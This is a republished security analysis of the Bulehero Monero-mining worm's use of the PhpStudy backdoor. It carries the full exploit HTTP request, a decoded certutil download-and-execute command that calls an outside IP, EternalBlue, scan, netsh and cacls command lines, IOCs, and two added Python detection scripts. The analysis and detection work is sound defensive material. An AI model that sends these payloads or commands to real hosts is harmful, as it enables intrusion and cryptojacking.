Shulou (Shulou.com) 06/01 Report
2025-02-24 update, from SLTechnology News&Howtos (Database)
Overview

Recently, the Aliyun security team observed a version upgrade of the Bulehero mining worm. After the upgrade the worm began using the recently disclosed PhpStudy backdoor as a new way to attack Windows hosts. Once an attack succeeds, a Monero mining program is downloaded to make money for the attackers. The miner seizes as much server CPU as it can, which makes the server stall, seriously disrupts normal business and can bring services down altogether. The worm was first exposed in July 2018 and has been updated frequently since, with dozens of attack methods added one after another. The group behind it can be expected to keep looking for new attack vectors through which to implant its malicious programs. Users are advised to check their hosts for security vulnerabilities promptly and to follow the Aliyun security team's related articles.

Background

Bulehero

The Bulehero mining worm first appeared in early 2018 and was first exposed in August 2018; it was named after bulehero.in, the earliest domain it used. The worm targets Windows servers and profits by implanting mining malware. It spreads through a variety of complex attacks and has been updated frequently since it appeared, constantly adding new attacks to its arsenal.

The PhpStudy backdoor

PhpStudy is a free integrated PHP debugging-environment package that is popular in China, where it has close to a million PHP learners and developers as users. On September 20, 2019 it was revealed that PhpStudy contained a backdoor: as early as 2016, attackers had broken into the official PhpStudy website and replaced the installation package with a trojanised one.
The backdoor gives remote control of the computer; it can download and run scripts remotely to collect users' personal information. Reportedly, the attackers used it to take control of more than 670,000 computers and to steal more than 100,000 records such as account passwords, chat data and device identifiers. Beyond mining and information theft, the backdoor can also be used to deliver ransomware, and key server data encrypted by ransomware cannot be recovered, which causes heavy data and financial loss to the victims.

Worm analysis

Attack behavior

The attacker sends an exploiting HTTP GET request to the target server. The malicious code is carried in the Accept-Charset request header, base64-encoded. Decoding it reveals a Windows command that downloads and runs download.exe with the certutil.exe tool:

    GET /index.php HTTP/1.1
    Connection: Keep-Alive
    Accept: */*
    Accept-Charset: c3lzdGVtKCdjZXJ0dXRpbC5leGUgLXVybGNhY2hlIC1zcGxpdCAtZiBodHRwOi8vNjAuMTY0LjI1MC4xNzA6Mzg4OC9kb3dubG9hZC5leGUgJVN5c3RlbVJvb3QlL1RlbXAvZ2Jubm5teXdrdmd3aGZxMTM5OTAuZXhlICYgJVN5c3RlbVJvb3QlL1RlbXAvZ2Jubm5teXdrdmd3aGZxMTM5OTAuZXhlJyk7ZWNobyBtZDUoJ3BocHN0dWR5Jyk7
    Accept-Encoding: gzip,deflate
    Accept-Language: zh-cn
    Referer: http://xxx:80/index.php
    User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)
    Host: xxx

Decoded Accept-Charset value:

    system('certutil.exe -urlcache -split -f http://60.164.250.170:3888/download.exe %SystemRoot%/Temp/gbnnnmywkvgwhfq13990.exe & %SystemRoot%/Temp/gbnnnmywkvgwhfq13990.exe');echo md5('phpstudy');

The trailing echo md5('phpstudy') prints a known digest into the HTTP response, so the attacker can tell from the reply whether the code executed. The trojanised php_xmlrpc.dll shipped with PhpStudy only evaluates the Accept-Charset payload when the request also carries Accept-Encoding: gzip,deflate, so a base64-looking Accept-Charset value together with that exact Accept-Encoding value is a usable signature for WAF rules and full request captures.
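As an added example (not code from the Aliyun article or from the worm), the following Python script parses a raw HTTP request, base64-decodes the Accept-Charset header and flags the PhpStudy backdoor pattern: a decoded value that calls a PHP execution function, the Accept-Encoding: gzip,deflate trigger that public analyses of the trojanised php_xmlrpc.dll report, the download URL, the dropped file path and the md5('phpstudy') canary. The two sample requests are constructed (one re-typed from the request above, one benign); the field names of the result dictionary are this example's own choice.

```python
import base64
import binascii
import re

# Constructed samples: the exploit request quoted in the article, re-typed as raw HTTP,
# and a benign request with ordinary Accept-Charset / Accept-Encoding values.
EXPLOIT_REQUEST = (
    "GET /index.php HTTP/1.1\r\n"
    "Connection: Keep-Alive\r\n"
    "Accept: */*\r\n"
    "Accept-Charset: c3lzdGVtKCdjZXJ0dXRpbC5leGUgLXVybGNhY2hlIC1zcGxpdCAtZiBodHRwOi8vNjAuMTY0LjI1MC4xNzA6Mzg4OC9kb3dubG9hZC5leGUgJVN5c3RlbVJvb3QlL1RlbXAvZ2Jubm5teXdrdmd3aGZxMTM5OTAuZXhlICYgJVN5c3RlbVJvb3QlL1RlbXAvZ2Jubm5teXdrdmd3aGZxMTM5OTAuZXhlJyk7ZWNobyBtZDUoJ3BocHN0dWR5Jyk7\r\n"
    "Accept-Encoding: gzip,deflate\r\n"
    "Accept-Language: zh-cn\r\n"
    "Referer: http://xxx:80/index.php\r\n"
    "User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)\r\n"
    "Host: xxx\r\n"
    "\r\n"
)
BENIGN_REQUEST = (
    "GET /index.php HTTP/1.1\r\n"
    "Host: xxx\r\n"
    "Accept-Charset: ISO-8859-1,utf-8;q=0.7\r\n"
    "Accept-Encoding: gzip, deflate\r\n"
    "\r\n"
)

# PHP functions that turn a decoded header into code execution on the server
PHP_EXEC_RE = re.compile(r"\b(system|exec|shell_exec|passthru|popen|eval|assert)\s*\(", re.I)
URL_RE = re.compile(r"https?://[^\s'\"&;]+")
DROP_PATH_RE = re.compile(r"%SystemRoot%[\\/][^\s'\"&;]+", re.I)


def parse_request(raw):
    """Split a raw HTTP request into (request line, dict of lower-cased header names)."""
    head = raw.split("\r\n\r\n", 1)[0].split("\r\n")
    headers = {}
    for line in head[1:]:
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return head[0], headers


def decode_charset_payload(value):
    """Return the Accept-Charset value decoded as base64 text, or None if it is not base64.
    A real charset list ("ISO-8859-1,utf-8;q=0.7") contains characters outside the
    base64 alphabet, so strict decoding rejects it."""
    try:
        return base64.b64decode(value, validate=True).decode("utf-8")
    except (binascii.Error, UnicodeDecodeError):
        return None


def analyze_request(raw):
    """Flag a PhpStudy-backdoor exploit attempt and pull out the indicators it carries."""
    request_line, headers = parse_request(raw)
    result = {"request_line": request_line, "backdoor_trigger": False,
              "payload": None, "urls": [], "drop_paths": [], "canary": False}
    payload = decode_charset_payload(headers.get("accept-charset", ""))
    if payload is None or not PHP_EXEC_RE.search(payload):
        return result
    result["payload"] = payload
    # The trojanised php_xmlrpc.dll is reported to run the payload only for this exact value.
    encoding = headers.get("accept-encoding", "").replace(" ", "").lower()
    result["backdoor_trigger"] = encoding == "gzip,deflate"
    result["urls"] = list(dict.fromkeys(URL_RE.findall(payload)))
    result["drop_paths"] = list(dict.fromkeys(DROP_PATH_RE.findall(payload)))
    # echo md5('phpstudy') is the attacker's execution check; its presence is a strong signal
    result["canary"] = "md5('phpstudy')" in payload
    return result


if __name__ == "__main__":
    for name, req in (("exploit", EXPLOIT_REQUEST), ("benign", BENIGN_REQUEST)):
        print(name, analyze_request(req))
```

The script treats a decoded Accept-Charset that calls a PHP execution function as the primary signal, and uses the gzip,deflate trigger, the URL and the canary as corroboration; the extracted URL and dropped path are what you would feed into egress blocking and host triage.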
Behavior of the infected host

The figure above is a flow chart of the behavior of the malicious files on the host. download.exe is Bulehero's downloader; it fetches a file named ScarupnpLogon.exe, which drops several packaged malicious files that fall into three modules: a mining module, a scanning module and an attack module.

Mining module: mines Monero. In this version Bulehero does not use a public mining pool; it distributes mining work through a self-built pool proxy, which avoids exposing the wallet address and hinders tracking by security researchers.

Scanning module: scans the Internet for specific open ports and writes the results to a file named Result.txt. The command line uses masscan-style arguments (a target list, JSON output, a packet rate and a single target port):

    C:\Windows\gstmlepnk\ntkpmzgif\uktkebigm.exe -iL C:\Windows\gstmlepnk\ntkpmzgif\ip.txt -oJ C:\Windows\gstmlepnk\ntkpmzgif\Result.txt --open --rate 4096 -p 445

Attack module: integrates a variety of exploit tools, reads the scan results and attacks other hosts. The following process uses the EternalBlue exploit module:

    C:\Windows\gstmlepnk\UnattendGC\specials\svschost.exe --InConfig C:\Windows\gstmlepnk\UnattendGC\specials\svschost.xml --TargetIp 106.14.149.128 --TargetPort 445 --DllPayload C:\Windows\gstmlepnk\UnattendGC\AppCapture64.dll --DllOrdinal 1 --ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll

Comparing the sample with Bulehero's behavior before the upgrade, its behavior on the host has not changed significantly: the file package is still fetched through the download.exe downloader and still unpacks into the same three functional modules. What changed is how the malicious files are named in order to hide them: before the upgrade they masqueraded behind look-alike system file names; after the upgrade, file paths and file names are all random.
Although random file names are more conspicuous than look-alike system file names, the advantage of this strategy is that other mining malware cannot recognise and kill the worm by process fingerprint, which gives it an edge in the competition for resources.

Other behaviors

It uses the netsh ipsec tool to block the vulnerable service port so that competitors cannot get in:

    netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=TCP
    netsh ipsec static add filteraction name=BastardsList action=block

It also locks down the hosts file, denying Users, Administrators and even SYSTEM access to it, so that competitors cannot hijack its domain names:

    cmd /c echo Y | cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y | cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y | cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM

Both changes outlive the malicious processes: when cleaning an infected host, the IPsec filter and filter action have to be removed and the ACL on the hosts file restored, otherwise port 445 stays blocked and the hosts file stays unwritable after the files themselves are deleted.

Timeline

Based on the compile time and upload time of Bulehero's malicious files, the upgrade can be dated to 23:00 on October 6, barely two weeks after the PhpStudy backdoor was exposed. For an enterprise that had the vulnerability, once the National Day holiday in between is taken out, that left only a few days for remediation. Judging by the download counts of the malicious files, there had been 15,000 downloads before this article was published, which shows how fast the worm spreads and how much damage it does.
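As an added example (not the article's or the worm's code), the Python script below turns the host-side behaviors described in this section into detection rules and runs them over constructed Sysmon-style process-creation events: certutil used as a download-and-execute tool, a masscan-style scan of port 445, the EternalBlue launcher switches, the netsh ipsec filter on port 445, the cacls lockdown of the hosts file, and a one-character look-alike of a system binary name such as svschost.exe. The event records, rule names and the triage threshold are this example's assumptions; the command lines are the ones quoted above.

```python
import re
from pathlib import PureWindowsPath

# Constructed Sysmon-style events (Image, CommandLine). Event 0 is benign filler; the
# others re-use the command lines quoted in the article. Sample data, not a real log.
EVENTS = [
    {"Image": r"C:\Windows\System32\svchost.exe",
     "CommandLine": r"C:\Windows\System32\svchost.exe -k netsvcs"},
    {"Image": r"C:\Windows\System32\certutil.exe",
     "CommandLine": r"certutil.exe -urlcache -split -f http://60.164.250.170:3888/download.exe "
                    r"C:\Windows\Temp\gbnnnmywkvgwhfq13990.exe"},
    {"Image": r"C:\Windows\gstmlepnk\ntkpmzgif\uktkebigm.exe",
     "CommandLine": r"C:\Windows\gstmlepnk\ntkpmzgif\uktkebigm.exe -iL C:\Windows\gstmlepnk\ntkpmzgif\ip.txt "
                    r"-oJ C:\Windows\gstmlepnk\ntkpmzgif\Result.txt --open --rate 4096 -p 445"},
    {"Image": r"C:\Windows\gstmlepnk\UnattendGC\specials\svschost.exe",
     "CommandLine": r"C:\Windows\gstmlepnk\UnattendGC\specials\svschost.exe --InConfig "
                    r"C:\Windows\gstmlepnk\UnattendGC\specials\svschost.xml --TargetIp 106.14.149.128 "
                    r"--TargetPort 445 --DllPayload C:\Windows\gstmlepnk\UnattendGC\AppCapture64.dll "
                    r"--DllOrdinal 1 --ProcessName lsass.exe --ProcessCommandLine --Protocol SMB "
                    r"--Architecture x64 --Function Rundll"},
    {"Image": r"C:\Windows\System32\netsh.exe",
     "CommandLine": r"netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me "
                    r"dstport=445 protocol=TCP"},
    {"Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"cmd /c echo Y | cacls C:\Windows\system32\drivers\etc\hosts /T /D users & "
                    r"echo Y | cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & "
                    r"echo Y | cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM"},
]

SYSTEM_NAMES = ("svchost.exe", "lsass.exe", "csrss.exe")


def rule_certutil_download(image, cmd):
    # certutil -urlcache -f <url> <file>: the living-off-the-land downloader the worm uses
    if PureWindowsPath(image).name.lower() == "certutil.exe" and re.search(r"-urlcache\b", cmd, re.I):
        url = re.search(r"https?://\S+", cmd)
        return {"rule": "certutil_download", "url": url.group(0) if url else None}


def rule_mass_scan(image, cmd):
    # masscan-style flags: target list in, JSON out, packet rate, port list
    if re.search(r"\s-iL\s", cmd) and re.search(r"\s-oJ\s", cmd) and re.search(r"--rate\s+\d+", cmd):
        ports = re.search(r"\s-p\s+([\d,\-]+)", cmd)
        return {"rule": "mass_port_scan", "ports": ports.group(1) if ports else None}


def rule_eternalblue(image, cmd):
    # EternalBlue launcher switches as they appear in the sample command line
    if re.search(r"--TargetIp\s+\S+", cmd) and "--DllPayload" in cmd and re.search(r"--Protocol\s+SMB", cmd, re.I):
        return {"rule": "eternalblue_launcher", "target": re.search(r"--TargetIp\s+(\S+)", cmd).group(1)}


def rule_ipsec_block(image, cmd):
    # netsh ipsec static add filter ... dstport=445: the worm shutting the door behind itself
    if re.search(r"netsh\s+ipsec\s+static\s+add\s+filter\b", cmd, re.I):
        kv = dict(re.findall(r"(\w+)=(\S+)", cmd))
        if "dstport" in kv:
            return {"rule": "ipsec_filter_added", "port": int(kv["dstport"]), "filterlist": kv.get("filterlist")}


def rule_hosts_lockdown(image, cmd):
    # cacls ... /D <principal> on the hosts file, denying even SYSTEM
    if re.search(r"\bcacls\b", cmd, re.I) and re.search(r"drivers\\etc\\hosts", cmd, re.I):
        denied = re.findall(r"/D\s+(\w+)", cmd)
        if denied:
            return {"rule": "hosts_file_acl_deny", "denied": denied}


def edit_distance(a, b):
    """Plain Levenshtein distance, enough to catch one-character typosquats."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def rule_lookalike_name(image, cmd):
    # svschost.exe is one insertion away from svchost.exe
    name = PureWindowsPath(image).name.lower()
    for real in SYSTEM_NAMES:
        if name != real and edit_distance(name, real) == 1:
            return {"rule": "lookalike_system_binary", "name": name, "mimics": real}


RULES = [rule_certutil_download, rule_mass_scan, rule_eternalblue,
         rule_ipsec_block, rule_hosts_lockdown, rule_lookalike_name]


def scan_events(events):
    """Run every rule over every event and return the findings tagged with the event index."""
    findings = []
    for idx, ev in enumerate(events):
        for rule in RULES:
            hit = rule(ev["Image"], ev["CommandLine"])
            if hit:
                hit["event"] = idx
                findings.append(hit)
    return findings


def triage(findings):
    """One hit may be an administrator; several distinct behaviors on one host is the worm."""
    distinct = {f["rule"] for f in findings}
    if len(distinct) >= 3:
        return "likely_bulehero"
    return "suspicious" if distinct else "clean"


if __name__ == "__main__":
    hits = scan_events(EVENTS)
    for h in hits:
        print(h)
    print("verdict:", triage(hits))
```

Each rule is deliberately narrow (a flag combination rather than a file name), because the upgraded worm randomises paths and names; the triage step then requires several independent behaviors before calling the host infected, which keeps a lone netsh or cacls command run by an administrator from raising the alarm on its own.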
Besides the PhpStudy backdoor added in this update, Bulehero uses a variety of other attack methods. The other known attacks follow.
IOCs

    60[.]164[.]250[.]170
    185[.]34 (address truncated on the page)
    fky[.]dfg45dfg45[.]best
    uu[.]dfg45dfg45[.]best
    uu1[.]dfg45dfg45[.]best
    ox[.]mygoodluck[.]best
    oo[.]mygoodluck[.]best

Security recommendations

Enterprises need to fix the vulnerabilities involved promptly; otherwise they easily become victims of mining trojans. Aliyun Security recommends its next-generation cloud firewall, which blocks malicious outbound connections and supports intelligent policies, helping to prevent intrusions effectively. However well an attacker hides on the host, downloading, mining and reverse shells all need outbound connections, and blocking them with the cloud firewall cuts the attack chain. Users can also block intrusions by blacklisting malicious sites directly through custom policies, and the cloud firewall's virtual patching lets customers block attacks more flexibly and without disruption. Users with higher customisation needs can consider the Aliyun security butler service: after purchase, experienced security experts provide consulting and tailor a hardening solution to prevent intrusions, and after an intrusion they can step in to assist directly with clean-up and event tracing. It suits users with higher security requirements, and enterprises that do not employ security engineers but want to keep their systems secure.

Author: Sandor
This article is original content of the Yunqi community and may not be reproduced without permission.
© 2024 shulou.com SLNews company. All rights reserved.